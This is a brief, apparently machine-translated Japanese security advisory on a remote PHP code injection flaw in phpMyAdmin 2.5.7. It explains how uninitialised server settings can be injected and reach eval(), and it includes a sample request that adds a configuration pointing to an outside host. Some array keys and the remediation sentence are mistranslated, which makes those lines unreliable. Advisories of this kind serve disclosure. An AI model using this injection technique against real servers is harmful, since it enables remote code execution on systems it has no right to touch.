関係するプログラム:
phpMyAdmin
説明:
phpMyAdmin リモート PHP コード インジェクションの脆弱性
詳細:
phpMyAdmin は、MySQL を管理するための WWW 管理インターフェイスを提供する無料のツールです。
phpMyAdmin には PHP コード インジェクションの問題があり、リモート攻撃者はこの eval() 関数を使用して任意の PHP コマンドを実行する可能性があります。
ただし、この脆弱性は $cfg[‘LeftFrameLight‘] 変数 (config.inc.php ファイル) が FALSE に設定されている場合にのみ機能します。
phpMyAdmin は、複数のサーバー設定を ($cfg['Servers'][$i]) 配列変数に保存します。これらの設定には、ホスト、ポート、ユーザー、パスワード、認証タイプが含まれます。などですが、$cfg['Servers'][$i] が初期化されていないため、リモート ユーザーは、構成を追加する次のリクエストを送信するなど、GET 関数を通じてサーバー構成を追加できます:
http:// target/phpMyAdmin-2.5.7/left .php?server=4&cfg[サーバー][ホスト]=202.81.x.x&cfg[サーバー][ポート]=8888&cfg[サーバー][ユーザー]=alice 。
そして eval() 関数内 $eval_string 文字列により PHP コードの実行が可能になり、攻撃者はサーバー構成を増やし、特別に構築されたテーブル名を送信することで、含まれている悪意のある PHP コードが実行される可能性があります。
影響を受けるシステム:
phpMyAdmin phpMyAdmin 2.5.7
攻撃方法:
有効な攻撃コードはまだありません
解決策:
現在、このソフトウェアのユーザーはこれを使用することをお勧めします。ソフトウェアはいつでも製造元のホームページに従って最新バージョンを入手してください:
http://www.phpmyadmin.net